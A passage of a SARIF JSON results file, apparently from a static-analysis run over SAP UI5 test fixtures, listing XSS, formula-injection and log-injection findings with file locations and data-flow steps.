input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided data"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}}}]},{"ruleId":"js/ui5-formula-injection","rule":{"id":"js/ui5-formula-injection","index":4,"toolComponent":{"index":4}},"message":{"text":"The content of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":268},"region":{"startLine":17,"startColumn":27,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"41899ff1a967017d:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":273},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":268},"region":{"startLine":8,"startColumn":23,"endColumn":38}},"message":{"text":"{ type: \"int\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":268},"region":{"startLine":17,"startColumn":27,"endColumn":45}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":273},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":273},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-formula-injection","rule":{"id":"js/ui5-formula-injection","index":4,"toolComponent":{"index":4}},"message":{"text":"The content of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":23,"startColumn":27,"endColumn":39}}}],"partialFingerprints":{"primaryLocationLineHash":"9afa5fd07ee36af6:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":282},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":9,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":15,"startColumn":29,"endColumn":47}},"message":{"text":"oControl.getText()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":15,"startColumn":21,"endColumn":26}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":53,"endColumn":58}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":46,"endColumn":59}},"message":{"text":"String(value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":36,"endColumn":60}},"message":{"text":"encodeX ... value))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":17,"startColumn":21,"endColumn":33}},"message":{"text":"xssSanitized"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277},"region":{"startLine":23,"startColumn":27,"endColumn":39}},"message":{"text":"xssSanitized"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":282},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":282},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-formula-injection","rule":{"id":"js/ui5-formula-injection","index":4,"toolComponent":{"index":4}},"message":{"text":"The content of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":288},"region":{"startLine":16,"startColumn":23,"endColumn":51}}}],"partialFingerprints":{"primaryLocationLineHash":"e701acdf85af03b4:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":288},"region":{"startLine":10,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":288},"region":{"startLine":16,"startColumn":23,"endColumn":51}},"message":{"text":"oModel. ... input')"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":16,"startColumn":31,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"3bb21c52eb38cf8:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":9,"startColumn":29,"endColumn":35}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":16,"startColumn":31,"endColumn":37}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":16,"startColumn":31,"endColumn":45}},"message":{"text":"oEvent.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":5,"startColumn":27,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"92dbc37bdafc7694:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"jQuery. ... param\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":5,"startColumn":27,"endColumn":32}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":3,"startColumn":17,"endColumn":51}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":12,"startColumn":27,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"faa1832c387d2ee5:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":12,"startColumn":27,"endColumn":32}},"message":{"text":"value"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":10,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":20,"startColumn":27,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"8291f53a2e235d15:1","primaryLocationStartColumnFingerprint":"22"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"documen ... .search"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":9,"endColumn":14}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":39,"endColumn":44}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":18,"endColumn":45}},"message":{"text":"jQuery. ... (value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":18,"startColumn":9,"endColumn":15}},"message":{"text":"value1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":20,"startColumn":27,"endColumn":33}},"message":{"text":"value1"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1},"region":{"startLine":17,"startColumn":17,"endColumn":41}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":132,"startColumn":7,"endLine":134,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"63ace7b071639814:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":25,"endColumn":48}},"message":{"text":"oSearch ... Value()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":11,"endColumn":22}},"message":{"text":"searchValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":27,"startColumn":34,"endColumn":45}},"message":{"text":"searchValue"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":17,"startColumn":13,"endColumn":31}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":133,"startColumn":8,"endColumn":27}},"message":{"text":"oControl.getTitle()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402},"region":{"startLine":132,"startColumn":7,"endLine":134,"endColumn":16}},"message":{"text":"\"<div>T ... </div>\""}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":25,"endColumn":48}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401},"region":{"startLine":23,"startColumn":25,"endColumn":48}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":424},"region":{"startLine":14,"startColumn":23,"endColumn":41}}}],"partialFingerprints":{"primaryLocationLineHash":"fc87b07640e9d85:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":425},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":424},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":424},"region":{"startLine":14,"startColumn":23,"endColumn":41}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434},"region":{"startLine":14,"startColumn":32,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"352d5eac262ae765:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434},"region":{"startLine":7,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434},"region":{"startLine":14,"startColumn":32,"endColumn":50}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-xss","rule":{"id":"js/ui5-xss","index":5,"toolComponent":{"index":4}},"message":{"text":"XSS vulnerability due to [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442},"region":{"startLine":14,"startColumn":28,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"352d5ec8b0c3bb0d:1","primaryLocationStartColumnFingerprint":"15"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":444},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442},"region":{"startLine":7,"startColumn":19,"endColumn":37}},"message":{"text":"{ type: \"string\" 